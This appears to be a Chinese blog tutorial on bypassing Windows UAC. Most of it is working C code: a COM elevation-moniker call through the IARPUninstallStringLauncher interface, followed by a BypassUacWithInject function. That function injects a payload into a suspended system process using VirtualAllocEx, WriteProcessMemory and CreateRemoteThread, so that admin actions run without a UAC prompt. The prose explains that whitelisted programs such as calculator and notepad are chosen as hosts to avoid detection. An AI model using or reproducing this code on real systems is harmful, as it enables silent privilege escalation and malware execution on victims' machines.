HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv) { BIND_OPTS3 bo; WCHAR wszCLSID[50]; WCHAR wszMonikerName[300]; StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0])); HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName)/sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID); if (FAILED(hr)) return hr; memset(&bo, 0, sizeof(bo)); bo.cbStruct = sizeof(bo); bo.hwnd = hwnd; bo.dwClassContext = CLSCTX_LOCAL_SERVER; return CoGetObject(wszMonikerName, &bo, riid, ppv); } int _tmain(int argc, _TCHAR* argv[]) { CLSID clsid; IID iid; LPVOID ppv = NULL; HRESULT hr; PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait pfn_LaunchUninstallStringAndWait = NULL; PFN_IARPUninstallStringLauncher_Release pfn_IARPUninstallStringLauncher_Release = NULL; if (IIDFromString(L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}", &clsid) || IIDFromString(L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}", &iid)) return 0; CoInitialize(NULL); hr = CoCreateInstanceAsAdmin(NULL, clsid, iid, &ppv); if (SUCCEEDED(hr)) { pfn_LaunchUninstallStringAndWait = (PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait)(*(DWORD*)(*(DWORD*)ppv + 12)); pfn_IARPUninstallStringLauncher_Release = (PFN_IARPUninstallStringLauncher_Release)(*(DWORD*)(*(DWORD*)ppv + 8)); if (pfn_LaunchUninstallStringAndWait && pfn_IARPUninstallStringLauncher_Release) { pfn_LaunchUninstallStringAndWait((LPVOID*)ppv, 0, L"{18E78D31-BBCC-4e6f-A21D-0A15BBC62D49}", 0, NULL); pfn_IARPUninstallStringLauncher_Release((LPVOID*)ppv); } } CoUninitialize(); return 0; }
为什么呢?因为执行该提权代码宿主的身份是不可信的,所以我们需要想办法让这段代码在windows的白名单程序中运行.所以很直接的会想到将这段代码注入到诸如计算器,记事本,桌面等等程序中去执行,这样就不会弹出UAC框了。
关键代码:
BOOL BypassUacWithInject(LPTSTR lpExe) { HMODULE hModule = GetModuleHandle(NULL); TCHAR cAppName[MAX_PATH] = {0}; STARTUPINFO si; PROCESS_INFORMATION pi; LPVOID lpMalwareBaseAddr; LPVOID lpNewVictimBaseAddr; HANDLE hThread; DWORD dwExitCode; BOOL bRet = FALSE; lpMalwareBaseAddr = g_ByPassUac; AddUninstallItem(lpExe); GetSystemDirectory(cAppName, MAX_PATH); _tcscat(cAppName, InjectTarget); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi) == 0) { return bRet; } lpNewVictimBaseAddr = VirtualAllocEx(pi.hProcess, NULL, SizeOfBypassUac, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (lpNewVictimBaseAddr == NULL) { return bRet; } WriteProcessMemory(pi.hProcess, lpNewVictimBaseAddr, (LPCVOID)lpMalwareBaseAddr, SizeOfBypassUac, NULL); hThread = CreateRemoteThread(pi.hProcess, 0, 0, (LPTHREAD_START_ROUTINE)lpNewVictimBaseAddr, NULL, 0, NULL); WaitForSingleObject(pi.hThread, INFINITE); GetExitCodeProcess(pi.hProcess, &dwExitCode); TerminateProcess(pi.hProcess, 0); DeleteUninstallItem(); return bRet; }
微信
支付宝